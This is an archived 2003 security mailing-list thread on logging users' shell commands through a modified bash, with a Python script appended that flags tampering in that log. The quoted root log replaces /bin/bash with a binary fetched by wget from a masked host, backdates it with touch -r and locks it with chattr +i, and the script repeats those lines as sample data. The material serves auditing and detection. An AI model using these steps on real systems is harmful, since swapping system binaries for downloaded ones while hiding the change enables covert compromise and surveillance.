Security Basics mailing list archives
RE: bash_history to track users
From: <arek () chelmnet pl>
Date: Fri, 14 Nov 2003 16:50:17 +0100
I have a modified /bin/bash which logs everything in one folder for every user, into a file with the same name as the user. This file looks like this (this is a fragment of the log for user root; in it you can see the bash binary being changed and the user history files being created...):

Jan 22 19:46:50 (28727): apt-get install bash
Jan 22 19:49:42 (28727): dpkg -i /var/cache/apt/archives/bash_2.05a-11_i386.deb
Jan 22 19:49:43 (28727): cd /bin
Jan 22 19:49:43 (28727): rm -f bash
Jan 22 19:49:43 (28727): wget http://xxxxxxxxxxx/bash
Jan 22 19:49:46 (28727): touch -r /bin/ping /bin/bash
Jan 22 19:49:46 (28727): chmod 711 bash
Jan 22 19:49:46 (28727): chattr +i bash
Jan 22 19:49:46 (28727): mkdir /usr/lib/histlog
Jan 22 19:49:46 (28727): for user in $(cat /etc/passwd | cut -f 1 -d :); do
Jan 22 19:49:46 (28727): file=/usr/lib/histlog/"$user"
Jan 22 19:49:46 (28727): if [ ! -e "$file" ]; then
Jan 22 19:49:46 (28727): uid=`id -u $user`
Jan 22 19:49:46 (28727): echo "Creating histlog $file for user $user"
Jan 22 19:49:46 (28727): touch /usr/lib/histlog/"$user"
Jan 22 19:49:47 (28727): chown $uid.0 /usr/lib/histlog/"$user"
Jan 22 19:49:47 (28727): chmod 600 /usr/lib/histlog/"$user"
Jan 22 19:49:47 (28727): chattr +a /usr/lib/histlog/"$user"
Jan 22 19:49:47 (28727): chmod 701 /usr/lib/histlog
Jan 22 19:49:47 (28727): fi
Jan 22 19:49:47 (28727): done
Jan 22 19:50:09 (28727): apt-get clean
Jan 22 19:50:09 (28727): ps aux

Arkadiusz Binder
The ONLY thing this would be useful for is being able to backtrack a clue-less user. A malicious user with clue will do what he wants and then go hand edit the bash history. After all, it's in his home directory and he owns it.

That's not entirely accurate. It's fairly easy to modify bash to log this file elsewhere...and it should not be much harder to have it log to two locations with different permissions... This makes the discussion a little bit more interesting.. Without hacking the code, though, I suppose you can write a script to parse the output of "w" and have it add items as they change.

-Jack

What kind of an environment are you trying to secure - is this a business where you can use something like a key stroke logger? or is it open to the
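
A reader for the log format shown in the message above, as an added example that is not part of the original post or of the modified bash: it tracks each shell PID's working directory and lists the commands that modify /bin/bash or /usr/lib/histlog. The set of modifying commands and the handling of `cd` are assumptions; the sample lines come from the message except the last, which is constructed.

```python
import posixpath
import re

# Line format used by the log in the message: "Mon DD HH:MM:SS (PID): command"
LINE_RE = re.compile(r"^(\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \((\d+)\): (.*)$")
# Paths taken from the message; the set of modifying commands is an assumption.
WATCHED = ("/bin/bash", "/usr/lib/histlog")
WRITERS = {"rm", "mv", "cp", "ln", "wget", "touch", "chmod", "chown", "chattr"}
# First six lines are copied from the message; the last one is constructed.
SAMPLE = """\
Jan 22 19:49:43 (28727): cd /bin
Jan 22 19:49:43 (28727): rm -f bash
Jan 22 19:49:43 (28727): wget http://xxxxxxxxxxx/bash
Jan 22 19:49:46 (28727): touch -r /bin/ping /bin/bash
Jan 22 19:49:46 (28727): chmod 711 bash
Jan 22 19:49:46 (28727): chattr +i bash
Jan 23 08:01:10 (30112): rm -f bash
""".splitlines()

def flag_tampering(lines):
    """Return (timestamp, pid, command) for commands that modify a watched path."""
    cwd = {}  # working directory per shell PID, learned from plain "cd <path>" lines
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        stamp, pid, cmd = m.group(1), int(m.group(2)), m.group(3)
        argv = cmd.split()  # whitespace split: an approximation of shell parsing
        if argv[:1] == ["cd"]:
            # A bare "cd" goes to a home directory the log does not name; use "/".
            target = argv[1] if len(argv) > 1 else "/"
            cwd[pid] = posixpath.normpath(posixpath.join(cwd.get(pid, "/"), target))
            continue
        if not argv or argv[0] not in WRITERS:
            continue
        for arg in argv[1:]:
            if arg.startswith(("-", "+")):
                continue  # an option or a chattr mode, not a path
            name = posixpath.basename(arg) if "://" in arg else arg  # wget output file
            path = posixpath.normpath(posixpath.join(cwd.get(pid, "/"), name))
            if any(path == w or path.startswith(w + "/") for w in WATCHED):
                hits.append((stamp, pid, cmd))
                break
    return hits

if __name__ == "__main__":
    for hit in flag_tampering(SAMPLE):
        print(*hit)
```

The constructed line for PID 30112 is not reported because that shell never logged a `cd`, so its relative `bash` resolves against `/` rather than `/bin`.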